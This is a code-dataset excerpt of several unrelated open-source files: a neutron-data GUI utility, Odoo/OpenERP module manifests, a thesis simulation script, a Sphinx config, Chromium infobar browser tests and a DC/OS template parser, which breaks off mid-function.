repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
|---|---|---|---|---|
neutrons/FastGR
|
refs/heads/master
|
addie/processing/mantid/master_table/utilities.py
|
1
|
from __future__ import (absolute_import, division, print_function)
from xml.dom import minidom
import numpy as np
class Utilities:
""" Utilities related to work in master table """
def __init__(self, parent=None):
self.parent = parent
self.table_ui = parent.processing_ui.h3_table
def get_row_index_from_row_key(self, row_key=None):
""" This methods returns the row for the given row key """
if row_key is None:
return -1
master_table_row_ui = self.parent.master_table_list_ui
nbr_row = self.table_ui.rowCount()
checkbox_ui_of_row_key = master_table_row_ui[row_key]['active']
for _row in np.arange(nbr_row):
_ui_checkbox = self.table_ui.cellWidget(_row, 0).children()[1]
if _ui_checkbox == checkbox_ui_of_row_key:
return _row
return -1
def get_row_key_from_row_index(self, row=-1):
""" This method returns the key (random key) of the given row in master table.
An example of its use is if we want to retrieve the placzek settings for this row
as they are saved in the master_table_row_ui using random key as the key
"""
if row == -1:
return None
master_table_row_ui = self.parent.master_table_list_ui
for _key in master_table_row_ui.keys():
_activate_ui = master_table_row_ui[_key]["active"]
_activate_ui_of_given_row = self.table_ui.cellWidget(row, 0).children()[1]
if _activate_ui == _activate_ui_of_given_row:
return _key
class LoadGroupingFile:
""" This class reads the XML file and will return the
number of groups <group ID=""> found in that file
"""
def __init__(self, filename=''):
self.filename = filename
def get_number_of_groups(self):
try:
xmldoc = minidom.parse(self.filename)
itemlist = xmldoc.getElementsByTagName('group')
return len(itemlist)
except:
return 'N/A'
|
StefanRijnhart/OpenUpgrade
|
refs/heads/master
|
addons/web_kanban_gauge/__openerp__.py
|
428
|
{
'name': 'Gauge Widget for Kanban',
'category': 'Hidden',
'description': """
This widget allows to display gauges using justgage library.
""",
'version': '1.0',
'depends': ['web_kanban'],
'data' : [
'views/web_kanban_gauge.xml',
],
'qweb': [
],
'auto_install': True,
}
|
yuanagain/seniorthesis
|
refs/heads/master
|
src/experiment_intervalsim.py
|
1
|
"""
experiment_intervalsim.py
Interval simulation, as in first part of Zgliczynski paper
Author: Yuan Wang
"""
from thesis_utils import *
from thesis_defaults import *
from thesis_poincare_utils import *
from thesis_plot_utils import *
import scipy.integrate as integrate
import scipy.special as special
from scipy.integrate import quad
from scipy.optimize import newton
import time
from evolutioninterval import *
from experiment import *
class ExperimentIntervalSim(Experiment):
# def __init__(self, evo, title = "TITLE", descr = ""):
# self.title = title
# self.descr = descr
# self.evo = evo
# self.setup()
# self.fig_ct = 0
def setParams(self, step_ct = 1, start_pt = default_start):
self.params['step_ct'] = step_ct
self.params['start_pt'] = start_pt
self.saveParams()
def run(self):
"""
Runs the Experiment
"""
data = self.evo.generate( self.params['start_pt'],
h = None,
p_e = 2,
stepCt = self.params['step_ct'] )
self.print(data)
def main():
"""
Testing
"""
print("============")
evo = Evolution_Valdez(lmbda = lmbda_set_1)
print(evo)
print("============")
print("============")
expmt = ExperimentIntervalSim(evo = evo,
title = "Zgliczynski Rigorous Interval Simulation",
descr = "Rigorous Interval Simulation w/ Lohner type algo per Zgliczynski paper")
expmt.setParams(step_ct = 10000, start_pt = toArray(tupleToIntervalVector(default_start)) )
# print("============")
print("Timing")
start = time.time()
expmt.run()
end = time.time()
print("Time:")
print(end - start)
if __name__=="__main__":
main()
|
ssteo/scrapy
|
refs/heads/master
|
scrapy/core/__init__.py
|
216
|
"""
Scrapy core library classes and functions.
"""
|
Vulcanior/GSB_Symfony
|
refs/heads/master
|
vendor/doctrine/orm/docs/en/conf.py
|
2448
|
# -*- coding: utf-8 -*-
#
# Doctrine 2 ORM documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 3 18:10:24 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.abspath('_exts'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['configurationblock']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Doctrine 2 ORM'
copyright = u'2010-12, Doctrine Project Team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2'
# The full version, including alpha/beta/rc tags.
release = '2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
language = 'en'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'doctrine'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['_theme']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Doctrine2ORMdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Doctrine2ORM.tex', u'Doctrine 2 ORM Documentation',
u'Doctrine Project Team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
primary_domain = "dcorm"
def linkcode_resolve(domain, info):
if domain == 'dcorm':
return 'http://'
return None
|
jmartinezchaine/OpenERP
|
refs/heads/master
|
openerp/addons/crm_profiling/__openerp__.py
|
9
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Customer Profiling',
'version': '1.3',
'category': 'Marketing',
'complexity': "easy",
'description': """
This module allows users to perform segmentation within partners.
=================================================================
It uses the profiles criteria from the earlier segmentation module and improve it. Thanks to the new concept of questionnaire. You can now regroup questions into a questionnaire and directly use it on a partner.
It also has been merged with the earlier CRM & SRM segmentation tool because they were overlapping.
* Note: this module is not compatible with the module segmentation, since it's the same which has been renamed.
""",
'author': 'OpenERP SA',
'website': 'http://www.openerp.com',
'depends': ['base', 'crm'],
'init_xml': [],
'update_xml': ['security/ir.model.access.csv', 'wizard/open_questionnaire_view.xml', 'crm_profiling_view.xml'],
'demo_xml': ['crm_profiling_demo.xml'],
'test': [
#'test/process/profiling.yml', #TODO:It's not debuging because problem to write data for open.questionnaire from partner section.
],
'installable': True,
'auto_install': False,
'certificate': '0033984979005',
'images': ['images/profiling_questionnaires.jpeg','images/profiling_questions.jpeg'],
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
espadrine/opera
|
refs/heads/master
|
chromium/src/chrome/test/functional/infobars.py
|
60
|
#!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
import re
import pyauto_functional # Must be imported before pyauto
import pyauto
import test_utils
class InfobarTest(pyauto.PyUITest):
"""TestCase for Infobars."""
def Debug(self):
"""Test method for experimentation.
This method will not run automatically.
To run:
python chrome/test/functional/infobars.py infobars.InfobarTest.Debug
"""
while True:
raw_input('Hit <enter> to dump info.. ')
info = self.GetBrowserInfo()
for window in info['windows']:
for tab in window['tabs']:
print 'Window', window['index'], 'tab', tab['index']
self.pprint(tab['infobars'])
def setUp(self):
pyauto.PyUITest.setUp(self)
self._flash_plugin_type = 'Plug-in'
if self.GetBrowserInfo()['properties']['branding'] == 'Google Chrome':
self._flash_plugin_type = 'Pepper Plugin'
# Forcibly trigger all plugins to get registered. crbug.com/94123
# Sometimes flash files loaded too quickly after firing browser
# ends up getting downloaded, which seems to indicate that the plugin
# hasn't been registered yet.
self.GetPluginsInfo()
def _GetTabInfo(self, windex=0, tab_index=0):
"""Helper to return info for the given tab in the given window.
Defaults to first tab in first window.
"""
return self.GetBrowserInfo()['windows'][windex]['tabs'][tab_index]
def testPluginCrashInfobar(self):
"""Verify the "plugin crashed" infobar."""
flash_url = self.GetFileURLForContentDataPath('plugin', 'flash.swf')
# Trigger flash plugin
self.NavigateToURL(flash_url)
child_processes = self.GetBrowserInfo()['child_processes']
flash = [x for x in child_processes if
x['type'] == self._flash_plugin_type and
x['name'] == 'Shockwave Flash'][0]
self.assertTrue(flash)
logging.info('Killing flash plugin. pid %d' % flash['pid'])
self.Kill(flash['pid'])
self.assertTrue(self.WaitForInfobarCount(1))
crash_infobar = self._GetTabInfo()['infobars']
self.assertTrue(crash_infobar)
self.assertEqual(1, len(crash_infobar))
self.assertTrue('crashed' in crash_infobar[0]['text'])
self.assertEqual('confirm_infobar', crash_infobar[0]['type'])
# Dismiss the infobar
self.PerformActionOnInfobar('dismiss', infobar_index=0)
self.assertFalse(self._GetTabInfo()['infobars'])
def _VerifyGeolocationInfobar(self, windex, tab_index):
"""Verify geolocation infobar properties.
Assumes that geolocation infobar is showing up in the given tab in the
given window.
"""
# TODO(dyu): Remove this helper function when a function to identify
# infobar_type and index of the type is implemented.
tab_info = self._GetTabInfo(windex, tab_index)
geolocation_infobar = tab_info['infobars']
self.assertTrue(geolocation_infobar)
self.assertEqual(1, len(geolocation_infobar))
self.assertEqual('Learn more', geolocation_infobar[0]['link_text'])
self.assertEqual(2, len(geolocation_infobar[0]['buttons']))
self.assertEqual('Allow', geolocation_infobar[0]['buttons'][0])
self.assertEqual('Deny', geolocation_infobar[0]['buttons'][1])
def testGeolocationInfobar(self):
"""Verify geoLocation infobar."""
url = self.GetHttpURLForDataPath('geolocation', 'geolocation_on_load.html')
self.NavigateToURL(url)
self.assertTrue(self.WaitForInfobarCount(1))
self._VerifyGeolocationInfobar(windex=0, tab_index=0)
# Accept, and verify that the infobar went away
self.PerformActionOnInfobar('accept', infobar_index=0)
self.assertFalse(self._GetTabInfo()['infobars'])
def testGeolocationInfobarInMultipleTabsAndWindows(self):
"""Verify GeoLocation inforbar in multiple tabs."""
url = self.GetFileURLForDataPath( # triggers geolocation
'geolocation', 'geolocation_on_load.html')
for tab_index in range(1, 2):
self.AppendTab(pyauto.GURL(url))
self.assertTrue(
self.WaitForInfobarCount(1, windex=0, tab_index=tab_index))
self._VerifyGeolocationInfobar(windex=0, tab_index=tab_index)
# Try in a new window
self.OpenNewBrowserWindow(True)
self.NavigateToURL(url, 1, 0)
self.assertTrue(self.WaitForInfobarCount(1, windex=1, tab_index=0))
self._VerifyGeolocationInfobar(windex=1, tab_index=0)
# Incognito window
self.RunCommand(pyauto.IDC_NEW_INCOGNITO_WINDOW)
self.NavigateToURL(url, 2, 0)
self.assertTrue(self.WaitForInfobarCount(1, windex=2, tab_index=0))
self._VerifyGeolocationInfobar(windex=2, tab_index=0)
def _GetFlashCrashInfobarCount(self, windex=0, tab_index=0):
"""Returns the count of 'Shockwave Flash has crashed' infobars."""
browser_window = self.GetBrowserInfo()['windows'][windex]
infobars = browser_window['tabs'][tab_index]['infobars']
flash_crash_infobar_count = 0
for infobar in infobars:
if (('text' in infobar) and
infobar['text'].startswith('Shockwave Flash has crashed')):
flash_crash_infobar_count += 1
return flash_crash_infobar_count
def testPluginCrashForMultiTabs(self):
"""Verify plugin crash infobar shows up only on the tabs using plugin."""
non_flash_url = self.GetFileURLForDataPath('english_page.html')
flash_url = self.GetFileURLForContentDataPath('plugin', 'FlashSpin.swf')
# False = Non flash url, True = Flash url
# We have set of these values to compare a flash page and a non-flash page
urls_type = [False, True, False, True, False]
for _ in range(2):
self.AppendTab(pyauto.GURL(flash_url))
self.AppendTab(pyauto.GURL(non_flash_url))
# Killing flash process
child_processes = self.GetBrowserInfo()['child_processes']
flash = [x for x in child_processes if
x['type'] == self._flash_plugin_type and
x['name'] == 'Shockwave Flash'][0]
self.assertTrue(flash)
self.Kill(flash['pid'])
# Crash plugin infobar should show up in the second tab of this window
# so passing window and tab argument in the wait for an infobar.
self.assertTrue(self.WaitForInfobarCount(1, windex=0, tab_index=1))
for i in range(len(urls_type)):
# Verify that if page doesn't have flash plugin,
# it should not have infobar popped-up
self.ActivateTab(i)
if not urls_type[i]:
self.assertEqual(
self._GetFlashCrashInfobarCount(0, i), 0,
msg='Did not expect crash infobar in tab at index %d' % i)
elif urls_type[i]:
self.assertEqual(
self._GetFlashCrashInfobarCount(0, i), 1,
msg='Expected crash infobar in tab at index %d' % i)
infobar = self.GetBrowserInfo()['windows'][0]['tabs'][i]['infobars']
self.assertEqual(infobar[0]['type'], 'confirm_infobar')
self.assertEqual(len(infobar), 1)
class OneClickInfobarTest(pyauto.PyUITest):
"""Tests for one-click sign in infobar."""
BLOCK_COOKIE_PATTERN = {'https://accounts.google.com/': {'cookies': 2}}
OC_INFOBAR_TYPE = 'oneclicklogin_infobar'
PW_INFOBAR_TYPE = 'password_infobar'
URL = 'https://www.google.com/accounts/ServiceLogin'
URL_LOGIN = 'https://www.google.com/accounts/Login'
URL_LOGOUT = 'https://www.google.com/accounts/Logout'
def setUp(self):
pyauto.PyUITest.setUp(self)
self._driver = self.NewWebDriver()
def _LogIntoGoogleAccount(self, tab_index=0, windex=0):
"""Log into Google account.
Args:
tab_index: The tab index, default is 0.
windex: The window index, default is 0.
"""
creds = self.GetPrivateInfo()['test_google_account']
username = creds['username']
password = creds['password']
test_utils.GoogleAccountsLogin(self, username, password, tab_index, windex)
# TODO(dyu): Use WaitUntilNavigationCompletes after investigating
# crbug.com/124877
self.WaitUntil(
lambda: self.GetDOMValue('document.readyState'),
expect_retval='complete')
def _PerformActionOnInfobar(self, action):
"""Perform an action on the infobar: accept, cancel, or dismiss.
The one-click sign in infobar must show in the first tab of the first
window. If action is 'accept' then the account is synced. If the action is
'cancel' then the infobar should be dismissed and never shown again. The
account will not be synced. If the action is 'dismiss' then the infobar will
shown again after the next login.
Args:
action: The action to perform on the infobar.
"""
infobar_index = test_utils.WaitForInfobarTypeAndGetIndex(
self, self.OC_INFOBAR_TYPE)
self.PerformActionOnInfobar(action, infobar_index)
def _DisplayOneClickInfobar(self, tab_index=0, windex=0):
"""One-click sign in infobar appears after logging into google account.
Args:
tab_index: The tab index, default is 0.
windex: The window index, default is 0.
"""
self._LogIntoGoogleAccount(tab_index=tab_index, windex=windex)
self.assertTrue(self.WaitUntil(
lambda: test_utils.GetInfobarIndexByType(
self, self.OC_INFOBAR_TYPE,
tab_index=tab_index, windex=windex) is not None),
msg='The one-click login infobar did not appear.')
def testDisplayOneClickInfobar(self):
"""Verify one-click infobar appears after login into google account.
One-click infobar should appear after signing into a google account
for the first time using a clean profile.
"""
self._DisplayOneClickInfobar()
def testNoOneClickInfobarAfterCancel(self):
"""Verify one-click infobar does not appear again after clicking cancel.
The one-click infobar should not display again after logging into an
account and selecting to reject sync the first time. The test covers
restarting the browser with the same profile and verifying the one-click
infobar does not show after login.
This test also verifies that the password infobar displays.
"""
self._DisplayOneClickInfobar()
self._PerformActionOnInfobar(action='cancel') # Click 'No thanks' button.
self.NavigateToURL(self.URL_LOGOUT)
self._LogIntoGoogleAccount()
test_utils.WaitForInfobarTypeAndGetIndex(self, self.PW_INFOBAR_TYPE)
test_utils.AssertInfobarTypeDoesNotAppear(self, self.OC_INFOBAR_TYPE)
# Restart browser with the same profile.
self.RestartBrowser(clear_profile=False)
self.NavigateToURL(self.URL_LOGOUT)
self._LogIntoGoogleAccount()
test_utils.AssertInfobarTypeDoesNotAppear(self, self.OC_INFOBAR_TYPE)
def testDisplayOneClickInfobarAfterDismiss(self):
"""Verify one-click infobar appears again after clicking dismiss button.
The one-click infobar should display again after logging into an
account and clicking to dismiss the infobar the first time.
This test also verifies that the password infobar does not display.
The one-click infobar should supersede the password infobar.
"""
self._DisplayOneClickInfobar()
self._PerformActionOnInfobar(action='dismiss') # Click 'x' button.
self.NavigateToURL(self.URL_LOGOUT)
self._LogIntoGoogleAccount()
test_utils.WaitForInfobarTypeAndGetIndex(self, self.OC_INFOBAR_TYPE)
test_utils.AssertInfobarTypeDoesNotAppear(self, self.PW_INFOBAR_TYPE)
def _OpenSecondProfile(self):
"""Create a second profile."""
self.OpenNewBrowserWindowWithNewProfile()
self.assertEqual(2, len(self.GetMultiProfileInfo()['profiles']),
msg='The second profile was not created.')
def testDisplayOneClickInfobarPerProfile(self):
"""Verify one-click infobar appears for each profile after sign-in."""
# Default profile.
self._DisplayOneClickInfobar()
self._OpenSecondProfile()
self._DisplayOneClickInfobar(windex=1)
def testNoOneClickInfobarWhenCookiesBlocked(self):
"""Verify one-click infobar does not show when cookies are blocked.
One-click sign in should not be enabled if cookies are blocked for Google
accounts domain.
This test verifies the following bug: crbug.com/117841
"""
# Block cookies for Google accounts domain.
self.SetPrefs(pyauto.kContentSettingsPatternPairs,
self.BLOCK_COOKIE_PATTERN)
self._LogIntoGoogleAccount()
test_utils.AssertInfobarTypeDoesNotAppear(self, self.OC_INFOBAR_TYPE)
def testOneClickInfobarShownWhenWinLoseFocus(self):
"""Verify one-click infobar still shows when window loses focus.
This test verifies the following bug: crbug.com/121739
"""
self._LogIntoGoogleAccount()
test_utils.WaitForInfobarTypeAndGetIndex(self, self.OC_INFOBAR_TYPE)
# Open new window to shift focus away.
self.OpenNewBrowserWindow(True)
test_utils.GetInfobarIndexByType(self, self.OC_INFOBAR_TYPE)
def testNoOneClickInfobarInIncognito(self):
"""Verify that one-click infobar does not show up in incognito mode."""
self.RunCommand(pyauto.IDC_NEW_INCOGNITO_WINDOW)
self._LogIntoGoogleAccount(windex=1)
test_utils.AssertInfobarTypeDoesNotAppear(
self, self.OC_INFOBAR_TYPE, windex=1)
if __name__ == '__main__':
pyauto_functional.Main()
|
mesosphere-mergebot/mergebot-test-dcos
|
refs/heads/master
|
gen/template.py
|
16
|
# Simple python templating system. Works on yaml files which are also jinja-style templates.
# Scans the jinja for the structure, and outputs an AST of the possible option combinations.
# That graph could be fed into something like an argument prompter to get
# out all the arguments.
# Simple state machine parser, hard coded. Recognizes a couple tokens:
# "template body" - arbitrary bytes
# To escape the template signature, put four `{`, so `{{{{` would result in the final result getting a `{{`.
# For closing ones, just put closing wherever. Excess closing isn't an error, and closing is only
# consumed if opening has been passed.
# Unmatched closing }} are a hard error.
# "template variable" - {{ <identifier> }}
# "template flow control" - {% <control_expression %}
# The valid control expressions are:
# switch <identifier>
# case <string>:
# endswith
from typing import Optional, Tuple
from pkg_resources import resource_string
import gen.internals
identifier_valid_characters = 'abcdefghijklmnopqrstuvwxyz_0123456789'
class SyntaxError(Exception):
def __init__(self, message, filename=None):
self.message = message
self.filename = filename
def __str__(self):
if self.filename:
return repr(self.message) + " while parsing file {}".format(self.filename)
else:
return repr(self.message)
class Tokenizer:
def __init__(self, corpus: str):
self.__corpus = corpus
self.__to_lex = corpus
self.__token_pos = 0
self.tokens = []
while True:
try:
kind, value = self.__read_token()
except SyntaxError as ex:
# TOOD(cmaloney): Calculate line and column information
context = "context: '{}'".format(self.__to_lex[:10])
raise SyntaxError(
"ERROR parsing code near {}. {}".format(context, ex)) from ex
self.tokens.append((kind, value))
if kind == "eof":
break
def peek(self):
if self.__token_pos == len(self.tokens):
raise RuntimeError("Walked past end of token list")
return self.tokens[self.__token_pos]
def advance(self):
if self.__token_pos >= len(self.tokens):
raise RuntimeError("Walked past end of token list")
self.__token_pos += 1
return self.tokens[self.__token_pos]
def __read_token(self):
# __to_lex is set to none after the EOF token is emitted.
assert self.__to_lex is not None
if len(self.__to_lex) == 0:
self.__to_lex = None
return "eof", None
# If not starting with '{', consume text until we find '{' as a blob
# token.
if self.__to_lex[0] != '{':
split = self.__to_lex.split('{', 1)
assert(len(split) == 1 or len(split) == 2)
if len(split) == 2:
self.__to_lex = '{' + split[1]
else:
# No remaining '{' in text. This is the end of the string.
self.__to_lex = ''
return 'blob', split[0]
# Process '{' beginning control sequences.
# Define some helper functions used by multiple methods below.
def read_whitespace():
if self.__to_lex[0] != ' ':
raise SyntaxError("Expected exactly one space")
if self.__to_lex[1].isspace():
raise SyntaxError(
"Found more spaces than expected. Only one space is allowed by coding convention.")
self.__to_lex = self.__to_lex[1:]
def read_identifier():
# Before identifiers is always whitespace / we're in control where
# whitespace is arbitrary.
read_whitespace()
identifier = ""
while self.__to_lex[0] in identifier_valid_characters:
identifier += self.__to_lex[0]
self.__to_lex = self.__to_lex[1:]
return identifier
def read_str():
read_whitespace()
if not self.__to_lex.startswith('"'):
raise SyntaxError(
"Expected string starting with '\"' as value for case but didn't find it.")
self.__to_lex = self.__to_lex[1:]
value = ""
has_backslash = False
while True:
if len(self.__to_lex) == 0:
raise SyntaxError(
"Unexpected end of file when reading contents of string")
cur = self.__to_lex[0]
self.__to_lex = self.__to_lex[1:]
if cur in ['\n', '\r']:
raise SyntaxError("Newlines aren't allowed in strings")
if has_backslash:
if cur in ['"', '\\']:
value += cur
else:
raise SyntaxError("Invalid escape sequence \\{} in quote".format(cur))
has_backslash = False
continue
if cur == '\\':
has_backslash = True
elif cur == '"':
return value
else:
value += cur
def read_end_control_group():
# Arbitrary whitespace is allowed before end of the control group
read_whitespace()
if not self.__to_lex.startswith('%}'):
raise SyntaxError(
"Expected end of control group '%}' after control statement but didn't find it.")
self.__to_lex = self.__to_lex[2:]
# Note: We want the longest match to win. Since we are doing prefix
# matching that means we must test the longest strings which have
# prefixes which are also valid tokens first.
if self.__to_lex.startswith('{{{{'):
self.__to_lex = self.__to_lex[4:]
return "blob", "{{"
if self.__to_lex.startswith('{{{'):
raise SyntaxError(
"{{{ is illegal. To make an argument substitution use " +
"{{ <identifier> }}. To make '{{' use '{{{{'. To make '{{{' " +
"use '{{{{{' (the first for become two, then the last is left" +
" alone since it is all alone)")
elif self.__to_lex.startswith('{%'):
# TODO(cmaloney): There is fairly specific parsing happening in control and ident rather
# than doing what they probably _should_ be doing for generic parsing. There is some
# duplicated code. That should be removed / refactored at some point.
# switch <identifier>
# case <string>
# endswitch
self.__to_lex = self.__to_lex[2:]
# Clean leading whitespace
read_whitespace()
if self.__to_lex.startswith("switch"):
self.__to_lex = self.__to_lex[6:]
identifier = read_identifier()
read_end_control_group()
return "switch", identifier
elif self.__to_lex.startswith("case"):
self.__to_lex = self.__to_lex[4:]
value = read_str()
read_end_control_group()
return "case", value
elif self.__to_lex.startswith("endswitch"):
self.__to_lex = self.__to_lex[9:]
read_end_control_group()
return "endswitch", None
elif self.__to_lex.startswith("for"):
self.__to_lex = self.__to_lex[3:]
new_var = read_identifier()
read_whitespace()
if not self.__to_lex.startswith("in"):
raise SyntaxError("Expected {% for foo in bar %}, didn't find the ' in'.")
self.__to_lex = self.__to_lex[2:]
iterable = read_identifier()
read_end_control_group()
return "for", (new_var, iterable)
elif self.__to_lex.startswith("endfor"):
self.__to_lex = self.__to_lex[6:]
read_end_control_group()
return "endfor", None
else:
raise SyntaxError(
"Unknown control group directive. Expected switch, case, or endswitch.")
elif self.__to_lex.startswith("{{"):
# whitespace ident whitespace close_curly
# Clean of leading whitespace
self.__to_lex = self.__to_lex[2:]
try:
identifier = read_identifier()
except SyntaxError as ex:
raise SyntaxError(
"{} while parsing argument substitution block {{{{ <identifier> }}}}.".format(ex)) from ex
if len(identifier) == 0:
raise SyntaxError("Identifier must be a non-empty string")
# trailing whitespace after identifier
read_whitespace()
# Optionally a filter expresion
filter_id = None
if self.__to_lex.startswith('|'):
self.__to_lex = self.__to_lex[1:]
filter_id = read_identifier()
read_whitespace()
# Close curly braces
if not self.__to_lex.startswith('}}'):
raise SyntaxError(
"Expected '}}' after '{{ <identifier>' but didn't find it.")
self.__to_lex = self.__to_lex[2:]
return "replacement", (identifier, filter_id)
else:
# Was just a single open curly, we're a single curly blob
self.__to_lex = self.__to_lex[1:]
return "blob", "{"
# Language:
# template -> chunks EOF
# chunks -> chunk*
# abstract chunk
# blob: chunk -> blob # This is represented as just a str
# replacement: chunk -> replacement
# switch: chunk -> startswitch cases endswitch
# cases -> case* # This is represented as just a dictionary
# case -> case_tok chunks
class Switch:
def __init__(self, identifier: str, cases: dict):
self.identifier = identifier
self.cases = cases
def __repr__(self):
return "<switch {} {}>".format(self.identifier, self.cases)
def __eq__(self, other):
return isinstance(other, Switch) and self.identifier == other.identifier and self.cases == other.cases
class For:
def __init__(self, new_var: str, iterable: str, body: list):
self.new_var = new_var
self.iterable = iterable
self.body = body
def __repr__(self):
return "<for {} in {}>".format(self.new_var, self.iterable)
def __eq__(self, other):
return isinstance(other, For) and self.new_var == other.new_var and self.iterable == other.iterable
class Replacement:
def __init__(self, identifier_and_filter: Tuple[str, Optional[str]]):
self.identifier = identifier_and_filter[0]
self.filter = identifier_and_filter[1]
def __repr__(self):
return "<replacement {}{}>".format(
self.identifier,
(" filter " + self.filter) if self.filter is not None else "")
def __eq__(self, other):
return isinstance(other, Replacement) and self.identifier == other.identifier
class UnsetParameter(KeyError):
def __init__(self, message, identifier):
super(KeyError, self).__init__(message)
self.identifier = identifier
class UnsetMarker:
pass
class Template:
def __init__(self, ast: list):
self.ast = ast
def render(self, arguments: dict, filters: dict={}):
def get_argument(name):
try:
return arguments[name]
except KeyError as ex:
raise UnsetParameter("Unset parameter {}".format(name), name) from ex
def render_ast(ast):
rendered = ""
for chunk in ast:
if isinstance(chunk, Switch):
choice = get_argument(chunk.identifier)
if choice not in chunk.cases:
raise ValueError("switch %s: value `%s` is not in the set of handled cases" % (
chunk.identifier, choice))
rendered += render_ast(chunk.cases[choice])
elif isinstance(chunk, Replacement):
value = get_argument(chunk.identifier)
if chunk.filter is None:
rendered += str(value)
else:
try:
filter_func = filters[chunk.filter]
except KeyError:
raise UnsetParameter("Unset filter parameter {}".format(chunk.filter), chunk.filter)
rendered += str(filter_func(value))
elif isinstance(chunk, For):
# If the argument is a string, it should be a json list.
iterable = get_argument(chunk.iterable)
# TODO(cmaloney): for should only be used (for now) in code which doesn't contain
# arbitrary user parameters.
# Stash the original state of the argument.
original_value = UnsetMarker()
if chunk.new_var in arguments:
original_value = arguments[chunk.new_var]
assert isinstance(iterable, list)
for value in iterable:
arguments[chunk.new_var] = value
rendered += render_ast(chunk.body)
# Reset the argument to the original state.
if isinstance(original_value, UnsetMarker):
del arguments[chunk.new_var]
else:
arguments[chunk.new_var] = original_value
elif isinstance(chunk, str):
rendered += chunk
else:
raise NotImplementedError(
"Unknown chunk type {}".format(type(chunk)))
return rendered
return render_ast(self.ast)
def target_from_ast(self):
def variables_from_ast(ast, blacklist):
target = gen.internals.Target()
for chunk in ast:
if isinstance(chunk, Switch):
scope = gen.internals.Scope(chunk.identifier)
